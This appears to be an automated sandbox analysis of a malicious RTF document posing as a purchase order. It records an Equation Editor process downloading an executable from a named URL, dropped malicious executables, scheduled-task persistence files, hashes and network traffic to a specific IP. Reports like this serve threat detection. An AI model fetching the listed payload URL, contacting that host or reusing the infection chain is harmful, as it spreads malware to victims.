                                                • Filename: PROFORMA INVOICE.doc, Detection: malicious, Browse
                                                • Filename: YD74eyfRAD.exe, Detection: malicious, Browse
                                                • Filename: PR0078966.xlsx, Detection: malicious, Browse
                                                • Filename: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx, Detection: malicious, Browse
                                                • Filename: 69JCWICJ9872001.exe, Detection: malicious, Browse
                                                • Filename: Proforma 0089 05 2019.xlsx, Detection: malicious, Browse
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:downloaded
                                                Size (bytes):530432
                                                Entropy (8bit):7.499649303212309
                                                Encrypted:false
                                                SSDEEP:12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
                                                MD5:19665F929613C0E945FF13DD25C9362E
                                                SHA1:7C68CDD329F0AF85782A4B567F9FA37928F942E8
                                                SHA-256:D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
                                                SHA-512:A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 39%
                                                IE Cache URL:http://lg-tv.tk/plugmanzx.exe
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-.*.0............{.....+..*&...}....*...0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.......*......d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33484DAD-E27E-45D9-8C45-49A85BDC4F7E}.tmp
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EE6AB4D1-7B2E-4321-A676-4477150FF17C}.tmp
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):15360
                                                Entropy (8bit):3.609723492008749
                                                Encrypted:false
                                                SSDEEP:384:0sAZI6on9948WksiTS+LIQ+220Mahajb807UZ:VAa9948WniTXW0MCa0jZ
                                                MD5:9178D85C40A7B56228F6D04638B09D16
                                                SHA1:E746A3E982A89040ACDEF54E1066A8D49D8CF671
                                                SHA-256:9713332DF9727B4BB0E67515CAB31910B619BCA3A627B8643BD5E0E7734BA1CA
                                                SHA-512:EEF8FCF442719BF0F8D009522B8374692CB35DBEF952B464F124E4D4098F3EF377AEE930FFB18EEF817869A7D4F81F7AF36DB03B7638FAB097053D750D990B24
                                                Malicious:false
                                                Preview: %.].9.?.@.>.^.5.?./.@.?.).[.[.`...*.!.:.,./.5.?.8...4.;.#.(...|./.0.?.?...0...2.*.2.1.%.?.=.[.6.5.!.^.*.-.^.+.1.@.4.)...%.[.4.8._.3.+.:.6.?.`.|.].2.!.3.?.?...?.).-.'.7.#.@.@.>.9.?.`.?.?.:...<.(.../.1./.%._.?.....@._.0.?.|.%.$.`.%...2...].+.|.^.+.%.%.%.0.*.;.9.$.?.~.3.<.4.:...`.~.^.?.>.;.?.8.~.?.1./.!.;...?.0.).(.).#.,.|.?.1.5.?.8.].$.0.'.+.#.~...%.:.5._...|.|...~.*.>...`././.?.$.&.#.:.&.0.0.'.5.`.&.).].+.6...?.?.`.9...>.?.@.6.1.,...1.6.^._.-.%.]._.,.&.$.@.`.^.%.9.;.5.....,.6.@.(.?...?.4.7.|.:...%.=.>._.4.[._.9.:.:.|.#.+.^.].'.).+.+.&.7...?.`.5.=...0...[.0...@.5._.?.&.7.?.2...%.;.].7.^./.#.!.<.7.!.?.+.?._...^.^.%.;.%.$.?.1.?.0.$.@.3.4.?.%./.../.<.9.3.6.;.*.^.?.(.=.?...*...(.&.'.7.#.?.?.../.7.`.]...?.&.$.^.4.?.|.<.#...7.~.5...;.~.8.3.%.-.9.?.%.7.6.?.&.(.~.).&.?.].%.8.%.!.6.`.*.`...?.2.%.@.3.|.1.9.[.(.7.@...%.%.~.).$.-.+.4.+.`.5.=...%.~.-.8.,.?.^.).&.%.(.).^.-...%.?.(.'.$.6.]...=.-.?.6.?.@.&.3.9.5.8.?.%.~.[.&.<.(.7.(.?...5.$.`.=.)...|.#.'.%.|.?.7.7.|...*.6.9.?._.-.'.]...'.;.6...?.^.2.).&.
                                                C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1310
                                                Entropy (8bit):5.1063907901076036
                                                Encrypted:false
                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                                                MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                                                SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                                                SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                                                SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                                                Malicious:false
                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                C:\Users\user\AppData\Local\Temp\tmp3709.tmp
                                                Process:C:\Users\user\AppData\Roaming\plugmangd5693.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1623
                                                Entropy (8bit):5.155064161946397
                                                Encrypted:false
                                                SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBLAtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3o
                                                MD5:F743C4C274FB1D49FD51F49B98EE0190
                                                SHA1:0C2FCC68B3ECBD1C981F8ACD3A45616400701D21
                                                SHA-256:8CF9313170C2C7DAA529A3EA1A985A1A387D53B9389B53D2068B2CD702D414FD
                                                SHA-512:706B60832231DF304ACC4B79A7F9897913200A385A86461A97EF222C5AD027286E1FDD2F04049451882668A468079EA2B30CB252056F65E5B634E31E67D8AC85
                                                Malicious:true
                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1320
                                                Entropy (8bit):5.135021273392143
                                                Encrypted:false
                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mn4xtn:cbk4oL600QydbQxIYODOLedq3Z4j
                                                MD5:40B11EF601FB28F9B2E69D36857BF2EC
                                                SHA1:B6454020AD2CEED193F4792B77001D0BD741B370
                                                SHA-256:C51E12D18CC664425F6711D8AE2507068884C7057092CFA11884100E1E9D49E1
                                                SHA-512:E3C5BCC714CBFCA4B8058DDCDDF231DCEFA69C15881CE3F8123E59ED45CFB5DA052B56E1945DCF8DC7F800D62F9A4EECB82BCA69A66A1530787AEFFEB15E2BD5
                                                Malicious:false
                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                File Type:Non-ISO extended-ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):8
                                                Entropy (8bit):3.0
                                                Encrypted:false
                                                SSDEEP:3:/28:h
                                                MD5:F10044BE58C4CFF9861E7CE15165188F
                                                SHA1:68BF9A7AAFF4CDA03DE25B689B08750D78FBE258
                                                SHA-256:ED11DBEC0B2ADD9F470A242EC996DCF25E10A2F8A7A1CE59A08B50EAC4CCC797
                                                SHA-512:D1502FB74EABC6DB68B9A63903B1CB4BCE34D1032C690EFDB3867EC46372D256D3CD8263C56EF1E424DB39A0E7B5058FAD73F0271BA4EC2BC8206BDA44702BA0
                                                Malicious:true
                                                Preview: ...w.H
                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):57
                                                Entropy (8bit):4.795707286467131
                                                Encrypted:false
                                                SSDEEP:3:oMty8WbSX/MNn:oMLWus
                                                MD5:D685103573539B7E9FDBF5F1D7DD96CE
                                                SHA1:4B2FE6B5C0B37954B314FCAEE1F12237A9B02D07
                                                SHA-256:D78BC23B0CA3EDDF52D56AB85CDC30A71B3756569CB32AA2F6C28DBC23C76E8E
                                                SHA-512:17769A5944E8929323A34269ABEEF0861D5C6799B0A27F5545FBFADC80E5AB684A471AD6F6A7FC623002385154EA89DE94013051E09120AB94362E542AB0F1DD
                                                Malicious:false
                                                Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-14092021.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Tue Sep 14 19:16:15 2021, length=19250, window=hide
                                                Category:dropped
                                                Size (bytes):2038
                                                Entropy (8bit):4.489360922629315
                                                Encrypted:false
                                                SSDEEP:48:89vXk/XTk3bfNHbaWf29vXk/XTk3bfNHbaWB:89vXk/Xg1aWf29vXk/Xg1aWB
                                                MD5:6F6D747317BCD05CFB044E0178FB69E3
                                                SHA1:E5A1133AF215FA6B4605134C338A46A1FB4B303C
                                                SHA-256:1C2960B87529A32700DA55DDA439527093C5716206DFBC11B1B28621019026BC
                                                SHA-512:4DEF13E318AE213310A8F546C0FCDDF2DA2784B61D98855A30AB3DFA38B0A12CEE26CA8787C8B8A9CB9D27FCBAE79E9ED5DED032671CDCA7378D135680D4516E
                                                Malicious:false
                                                Preview: L..................F.... ......?......?...c..^....2K...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.2K...S.. .PO-140~1.DOC..L.......S...S..*.........................P.O.-.1.4.0.9.2.0.2.1...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\PO-14092021.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.1.4.0.9.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......179605..........D_....3N...W...9..g............[D_....3N...W...9.
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):71
                                                Entropy (8bit):4.173450908347739
                                                Encrypted:false
                                                SSDEEP:3:M1gdm2d6ltkm2d6lmX1gdm2d6lv:MidtA/ktA1dtA1
                                                MD5:8E1A774A0EB457F3B7CF0D2BF0957E12
                                                SHA1:53A238F2EC11AEDE85D0D7A8219FCDC1DB20B6CD
                                                SHA-256:0F0C87BB362F6DAEA1C4E98ECD5130CD804E6F90E50E402C6597F5F6A975BF06
                                                SHA-512:B8620587D03F506BE43F37EEC9A3B74E18B74EB0B06E48F3EE21E36DCEED596FB507678F72FC762DE2007BAEE37825E3531E79C47E181124012D1774A3666F75
                                                Malicious:false
                                                Preview: [doc]..PO-14092021.LNK=0..PO-14092021.LNK=0..[doc]..PO-14092021.LNK=0..
                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.5038355507075254
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                Malicious:false
                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe
                                                Process:C:\Users\user\AppData\Roaming\plugmangd5693.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):530432
                                                Entropy (8bit):7.499649303212309
                                                Encrypted:false
                                                SSDEEP:12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
                                                MD5:19665F929613C0E945FF13DD25C9362E
                                                SHA1:7C68CDD329F0AF85782A4B567F9FA37928F942E8
                                                SHA-256:D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
                                                SHA-512:A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 39%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-.*.0............{.....+..*&...}....*...0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.......*......d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-
                                                C:\Users\user\AppData\Roaming\plugmangd5693.exe
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):530432
                                                Entropy (8bit):7.499649303212309
                                                Encrypted:false
                                                SSDEEP:12288:6B6k4DbF53e0IUFLtFlQqUpYpfiTzpFZ2z8WBTNMk4bUtvV:6BExiGaaNBTylO
                                                MD5:19665F929613C0E945FF13DD25C9362E
                                                SHA1:7C68CDD329F0AF85782A4B567F9FA37928F942E8
                                                SHA-256:D21ECA1AE974EF45B254C64420A069072CE32FCE6C191B526D9E81ECFA4537FF
                                                SHA-512:A364FEC326897ACC19409F3D8BFF688825B25718533B126D656B4EE9559B73D8DA82BDEC405A4B5321ADFC0A51E2A72BCD961D8CD39BB7AF5F67B362EE0D95E7
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 39%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.?a..............0.............b-... ...@....@.. ....................................@..................................-..O....@.......................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D-......H........d..........2...HH...............................................0..P........(...........s....}......++...+...{......s....(.......X........-....X........-.*.0............{.....+..*&...}....*...0..............0...2....0.....+....,......r...p..(.......(......(....o.........,......r?..p..(......+D...o.....+...(.......(......(.....o........(....-...........o.......*......d.+........0.."........~3........9.......~4.....o.......+.....+......X............-....X..........-..-
                                                C:\Users\user\Desktop\~$-14092021.doc
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.5038355507075254
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                Malicious:false
                                                Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, unknown version
                                                Entropy (8bit):4.546485661705798
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:PO-14092021.doc
                                                File size:19250
                                                MD5:93abec14185d380695f65beaaca97b84
                                                SHA1:c18eaeac2c4371dd8e79de62ce60a7b7767f995a
                                                SHA256:e73b710e825a32ebe4122240ecac87eff1bc76fe130fc41fc5858dafaf96d3b7
                                                SHA512:9be5938833bdbb9c501b71c60172a4ed10b79710a0cb84ca080d870b5fcf79c122bb5cd70e5883cd98c92079b0dafc28f0b7820c1dd2be39e48d46925dedb28a
                                                SSDEEP:192:XYkRruV0nOB2qrgbV0W7kI5HH/n4x+iiwgkEPAA2TKe6NDs/JEE5bBWB8V5QKSj:XYMKVo4TqkafQjCkTKe6NDWe0CrKSj
                                                File Content Preview:{\rtf954657%]9?@>^5?/@?)[[`.*!:,/5?8.4;#(.|/0??.0.2*21%?=[65!^*-^+1@4).%[48_3+:6?`|]2!3??.?)-'7#@@>9?`??:.<(./1/%_?..@_0?|%$`%.2.]+|^+%%%0*;9$?~3<4:.`~^?>;?8~?1/!;.?0)()#,|?15?8]$0'+#~.%:5_.||.~*>.`//?$&#:&00'5`&)]+6.??`9.>?@61,.16^_-%]_,&$@`^%9;5..,6@(?.

                                                File Icon

                                                Icon Hash:e4eea2aaa4b4b4a4

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                000001D06hno
                                                100001CC1hno

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                09/14/21-13:17:58.118312UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500728.8.8.8192.168.2.22

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 14, 2021 13:16:21.671324015 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.700056076 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.700134039 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.700583935 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.728485107 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730138063 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730185032 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730206966 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730218887 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730226994 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730251074 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730326891 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730355978 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730360031 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730391979 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730391979 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730412960 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730420113 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730490923 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730534077 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.730537891 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730575085 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730581045 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.730583906 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.738737106 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759104013 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759160042 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759195089 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759226084 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759253979 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759280920 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759303093 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759309053 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759335041 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759336948 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759356022 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759362936 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759366035 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759367943 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759371042 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759445906 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759473085 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759499073 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759499073 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759532928 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759542942 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759573936 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759573936 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759597063 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759629011 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759634972 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759634972 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759639025 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759691000 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759742022 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759747028 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759855032 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759882927 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759903908 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759929895 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.759931087 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759937048 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.759949923 CEST4916580192.168.2.22185.239.243.112
